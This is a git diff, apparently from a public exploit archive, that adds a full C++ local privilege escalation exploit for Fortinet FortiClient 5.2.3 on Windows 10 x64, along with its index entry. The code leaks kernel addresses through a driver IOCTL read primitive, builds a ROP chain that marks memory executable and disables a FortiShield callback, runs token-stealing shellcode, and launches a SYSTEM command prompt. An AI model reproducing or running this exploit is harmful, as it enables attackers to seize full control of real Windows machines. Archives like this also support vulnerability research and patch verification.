diff --git a/exploits/windows_x86-64/local/45149.cpp b/exploits/windows_x86-64/local/45149.cpp new file mode 100644 index 000000000..c63eb229a --- /dev/null +++ b/exploits/windows_x86-64/local/45149.cpp @@ -0,0 +1,225 @@ +#include "stdafx.h" +#include +#include +#include +#include + +#pragma comment (lib,"psapi") + +PULONGLONG leak_buffer = (PULONGLONG)VirtualAlloc((LPVOID)0x000000001a000000, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); +ULONGLONG leakQWORD(ULONGLONG addr, HANDLE driver) +{ + memset((LPVOID)0x000000001a000000, 0x11, 0x1000); + memset((LPVOID)0x000000001a001000, 0x22, 0x1000); + leak_buffer[0] = 0x000000001a000008; + leak_buffer[1] = 0x0000000000000003; + leak_buffer[4] = 0x000000001a000028; + leak_buffer[6] = addr - 0x70; + + DWORD IoControlCode = 0x22608C; + LPVOID InputBuffer = (LPVOID)0x000000001a000000; + DWORD InputBufferLength = 0x20; + LPVOID OutputBuffer = (LPVOID)0x000000001a001000; + DWORD OutputBufferLength = 0x110; + DWORD lpBytesReturned; + + BOOL triggerIOCTL; + triggerIOCTL = DeviceIoControl(driver, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL); + if (!triggerIOCTL) + { + printf("[!] Error in the SYSCALL: %d\n", GetLastError()); + } + + ULONGLONG result = leak_buffer[0x202]; + return result; +} + +ULONGLONG leakNtBase(HANDLE driver) +{ + ULONGLONG teb = (ULONGLONG)NtCurrentTeb(); + ULONGLONG thread = *(PULONGLONG)(teb + 0x78); + ULONGLONG threadInfo = leakQWORD(thread, driver); + ULONGLONG ntAddr = leakQWORD(threadInfo + 0x2a8, driver); + ULONGLONG baseAddr = 0; + ULONGLONG signature = 0x00905a4d; + ULONGLONG searchAddr = ntAddr & 0xFFFFFFFFFFFFF000; + + while (TRUE) + { + ULONGLONG readData = leakQWORD(searchAddr, driver); + ULONGLONG tmp = readData & 0xFFFFFFFF; + /* + printf("%llx\n", readData); + printf("%llx\n", tmp); + */ + + if (tmp == signature) + { + baseAddr = searchAddr; + break; + } + searchAddr = searchAddr - 0x1000; + } + return baseAddr; +} + +ULONGLONG leakFortiBase(HANDLE driver, ULONGLONG ntBase) +{ + ULONGLONG PsLoadModuleListAddr = ntBase + 0x34c5a0; + ULONGLONG searchAddr = leakQWORD(PsLoadModuleListAddr, driver); + ULONGLONG addr = 0; + while (1) + { + ULONGLONG namePointer = leakQWORD(searchAddr + 0x60, driver); + ULONGLONG name = leakQWORD(namePointer, driver); + if (name == 0x00740072006f0046) + { + name = leakQWORD(namePointer + 8, driver); + if (name == 0x0069006800530069) + { + addr = leakQWORD(searchAddr + 0x30, driver); + break; + } + } + searchAddr = leakQWORD(searchAddr, driver); + } + return addr; +} + +ULONGLONG allocate_fake_stack(ULONGLONG ntBase, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG pte_result) +{ + PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000f5ffe000, 0x12000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (fake_stack == NULL) + { + printf("[!] Error while allocating the fake stack: %d\n", GetLastError()); + return 1; + } + + memset(fake_stack, 0x41, 0x12000); + PULONGLONG ropStack = (PULONGLONG)fake_stack + 0x2000; + DWORD index = 0; + + // + ropStack[index] = ntBase + 0x1684ef; index++; // pop rax ; pop rcx ; ret + ropStack[index] = fortishield_callback; index++; // FortiShield Callback + ropStack[index] = 0x0000000000000000; index++; // NULL + ropStack[index] = ntBase + 0x937eb; index++; // mov qword [rax], rcx ; ret + // + + // + ropStack[index] = ntBase + 0x88614; index++; // pop rax ; ret + ropStack[index] = pte_result; index++; // PTE VA + ropStack[index] = ntBase + 0x1a3cb2; index++; // pop rdx ; ret + ropStack[index] = 0x0000000000000063; index++; // DIRTY + ACCESSED + R/W + PRESENT + ropStack[index] = ntBase + 0xe8a8b; index++; // mov byte [rax], dl ; add eax, 0x01740000 ; ret + ropStack[index] = ntBase + 0x11e000; index++; // wbinvd ; ret + // + + // + ropStack[index] = 0x00000000f6000100; index++; // Shellcode address + ropStack[index] = fortishield_restore; index++; // FortiShield return location + // + + char token_steal[] = + "\x48\x31\xc0\x65\x48\x8b\x80" + "\x88\x01\x00\x00\x48\x8b\x80" + "\xb8\x00\x00\x00\x49\x89\xc0" + "\x48\x8b\x80\xe8\x02\x00\x00" + "\x48\x2d\xe8\x02\x00\x00\x48" + "\x8b\x88\xe0\x02\x00\x00\x48" + "\x83\xf9\x04\x75\xe6\x4c\x8b" + "\x88\x58\x03\x00\x00\x4d\x89" + "\x88\x58\x03\x00\x00\x3E\x48" + "\x8B\x04\x24\x48\x89\xF4\x48" + "\x83\xEC\x20\xFF\xE0"; + + memcpy((fake_stack + 0x2020), token_steal, sizeof(token_steal)); + return 0; +} + +ULONGLONG get_pxe_address_64(ULONGLONG address, ULONGLONG pte_start) +{ + ULONGLONG result = address >> 9; + result = result | pte_start; + result = result & (pte_start + 0x0000007ffffffff8); + return result; +} + +int trigger_callback() +{ + printf("[+] Creating dummy file\n"); + system("echo test > C:\\Users\\n00b\\AppData\\LocalLow\\test.txt"); + printf("[+] Calling MoveFileEx()\n"); + + BOOL MFEresult = MoveFileEx(L"C:\\Users\\n00b\\AppData\\LocalLow\\test.txt", L"C:\\Users\\n00b\\AppData\\LocalLow\\test2.txt", MOVEFILE_REPLACE_EXISTING); + if (MFEresult == 0) + { + printf("[!] Error while calling MoveFileEx(): %d\n", GetLastError()); + return 1; + } + return 0; +} + +int main() +{ + LoadLibraryA("user32.dll"); // Populate Win32ThreadInfo + + HANDLE mdare = CreateFile(L"\\\\.\\mdareDriver_48", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); + if (mdare == INVALID_HANDLE_VALUE) + { + printf("[!] Error while creating a handle to the driver: %d\n", GetLastError()); + return 1; + } + + HANDLE forti = CreateFile(L"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); + if (forti == INVALID_HANDLE_VALUE) + { + printf("[!] Error while creating a handle to the driver: %d\n", GetLastError()); + return 1; + } + + LPDWORD hThread_id = 0; + HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&trigger_callback, NULL, CREATE_SUSPENDED, hThread_id); + if (hThread == NULL) + { + printf("[!] Error while calling CreateThread: %d\n", GetLastError()); + return 1; + } + + BOOL hThread_priority = SetThreadPriority(hThread, THREAD_PRIORITY_HIGHEST); + if (hThread_priority == 0) + { + printf("[!] Error while calling SetThreadPriority: %d\n", GetLastError()); + return 1; + } + + ULONGLONG ntBase = leakNtBase(mdare); + ULONGLONG ntPivot = ntBase + 0x1ab3ec; // mov esp, 0xf6000000; retn; + ULONGLONG ntMiGetPteAddressOffset = leakQWORD(ntBase + 0x62aeb, mdare); + ULONGLONG fortishieldBase = leakFortiBase(mdare, ntBase); + ULONGLONG fortishield_callback = fortishieldBase + 0xd150; + ULONGLONG fortishield_restore = fortishieldBase + 0x2f73; + printf("[+] ntoskrnl.exe base address is: 0x%llx\n", ntBase); + printf("[+] PTE VA start address is: 0x%llx\n", ntMiGetPteAddressOffset); + printf("[+] FortiShield.sys base address is: 0x%llx\n", fortishieldBase); + + ULONGLONG pte_result = get_pxe_address_64(0xf6000000, ntMiGetPteAddressOffset); + printf("[+] PTE virtual address for 0xf6000000: %I64x\n", pte_result); + allocate_fake_stack(ntBase, fortishield_callback, fortishield_restore, pte_result); + + DWORD IoControlCode = 0x220028; + ULONGLONG InputBuffer = ntPivot; + DWORD InputBufferLength = 0x8; + ULONGLONG OutputBuffer = 0x0; + DWORD OutputBufferLength = 0x0; + DWORD lpBytesReturned; + + //DebugBreak(); + + BOOL triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL); + ResumeThread(hThread); + WaitForSingleObject(hThread, INFINITE); + system("start cmd.exe"); + + return 0; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 20e43a697..59227f12a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9852,6 +9852,7 @@ id,file,description,date,author,type,platform,port 45132,exploits/linux/local/45132.rb,"SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)",2018-08-02,0x09AL,local,linux, 45142,exploits/windows/local/45142.py,"Wedding Slideshow Studio 1.36 - Buffer Overflow",2018-08-03,Achilles,local,windows, 45147,exploits/linux/local/45147.rb,"Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)",2018-08-03,Metasploit,local,linux, +45149,exploits/windows_x86-64/local/45149.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation",2018-08-05,"sickness & mschenk",local,windows_x86-64, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139